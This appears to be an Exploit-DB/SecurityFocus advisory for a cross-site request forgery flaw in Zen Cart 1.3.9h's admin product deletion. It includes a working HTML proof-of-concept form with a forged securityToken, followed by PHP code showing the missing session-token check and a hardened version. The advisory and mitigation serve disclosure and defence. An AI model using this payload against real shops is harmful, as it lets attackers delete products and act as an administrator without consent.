Zen Cart 1.3.9h – ‘/path_to_admin/product.php’ Cross-Site Request Forgery

  • Author: DisK0nn3cT
    Date: 2012-02-10
  • Category:
    Platform:
  • Source (Exploit-DB): https://www.exploit-db.com/exploits/36688/
  • Source (SecurityFocus): https://www.securityfocus.com/bid/51968/info
    
    Zen Cart is prone to a cross-site request-forgery (CSRF) vulnerability in its administrative interface.
    
    The delete_product_confirm action of /path_to_admin/product.php processes a POST request without validating the securityToken field; as the proof of concept below shows, any value in that field is accepted. An attacker who gets a logged-in administrator to submit such a form (the browser attaches the admin's session cookie automatically) can delete arbitrary products and perform other administrative actions, gaining unauthorized access to the affected application. Other attacks are also possible. The path_to_admin placeholder stands for the site's renamed admin directory, which the attacker must know or guess, as must the target product and category IDs.
    
    Zen Cart 1.3.9h is vulnerable; other versions may be affected.
    
    <!-- Proof of concept: a page hosted by the attacker. A logged-in Zen Cart
         administrator who submits it deletes product 329 from category 48.
         The securityToken value is arbitrary because the target never checks it. -->
    <form name="products" method="post"
          action="http://www.example.com/path_to_admin/product.php?action=delete_product_confirm">
    <label for="securityToken">Security Token</label><br/>
    <input type="text" id="securityToken" name="securityToken" value="Can be anything" /><br/><br/>
    <label for="products_id">Products ID</label><br/>
    <input type="text" id="products_id" name="products_id" value="329" /><br/><br/>
    <label for="product_categories[]">Products Category</label><br/>
    <input type="text" id="product_categories[]" name="product_categories[]" value="48" /><br/><br/>
    <input type="submit" value="Delete Product" />
    </form>
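    The check that the vulnerable handler is missing, shown as an added example alongside the flawed pattern. This is not Zen Cart's code: the function names, the session key, the return values and the simulated session are assumptions for illustration; only the field names (securityToken, products_id, product_categories[]) and the form values are taken from the proof of concept above.

```php
<?php
declare(strict_types=1);

// Added illustration, not Zen Cart code. Function names, the session layout and the
// boolean "deleted / rejected" results are assumptions; field names come from the PoC.

// Issue one unguessable token per admin session and embed it in every admin form.
function issue_security_token(array &$session): string
{
    if (empty($session['securityToken'])) {
        // 32 CSPRNG bytes, hex-encoded; random_bytes() throws if no secure source exists
        $session['securityToken'] = bin2hex(random_bytes(32));
    }
    return $session['securityToken'];
}

// Vulnerable pattern: the form carries a securityToken field, but the handler never
// compares it with the session, so a cross-site POST with any value is honoured.
function delete_product_vulnerable(array $session, array $post): bool
{
    if (!isset($post['products_id'])) {
        return false;
    }
    // deletion of $post['products_id'] would happen here
    return true;
}

// Hardened pattern: refuse the state-changing action unless the posted token is a
// string that exactly matches the token stored in the administrator's session.
function delete_product_hardened(array $session, array $post): bool
{
    $expected = $session['securityToken'] ?? '';
    $supplied = $post['securityToken'] ?? null;
    if ($expected === '' || !is_string($supplied)) {
        return false; // no session token, or token missing / not a string
    }
    // hash_equals() compares in constant time, so a partially right guess leaks nothing
    if (!hash_equals($expected, $supplied)) {
        return false;
    }
    // Only now, with the request proven to come from our own form, validate the rest.
    if (filter_var($post['products_id'] ?? null, FILTER_VALIDATE_INT) === false) {
        return false;
    }
    foreach ((array)($post['product_categories'] ?? []) as $cat) {
        if (filter_var($cat, FILTER_VALIDATE_INT) === false) {
            return false;
        }
    }
    // deletion of $post['products_id'] would happen here
    return true;
}

// Simulate the PoC: the administrator's session plus the attacker-controlled form
// fields (constructed from the form above).
$session = [];
$token = issue_security_token($session);

$attackerPost = [
    'securityToken'      => 'Can be anything',
    'products_id'        => '329',
    'product_categories' => ['48'],
];
// Same fields, but with the token the real admin form would carry.
$legitimatePost = ['securityToken' => $token] + $attackerPost;

printf("vulnerable handler, forged token: %s\n",
    delete_product_vulnerable($session, $attackerPost) ? 'deleted' : 'rejected');
printf("hardened handler, forged token:   %s\n",
    delete_product_hardened($session, $attackerPost) ? 'deleted' : 'rejected');
printf("hardened handler, session token:  %s\n",
    delete_product_hardened($session, $legitimatePost) ? 'deleted' : 'rejected');
```

    Run it with the PHP CLI. The vulnerable handler honours the forged request, while the hardened one rejects it and proceeds only when the posted token equals the one issued to the session. The same comparison belongs in front of every state-changing admin action, not only product deletion; checking the Origin or Referer header and marking the session cookie SameSite add defence in depth but do not replace the per-session token.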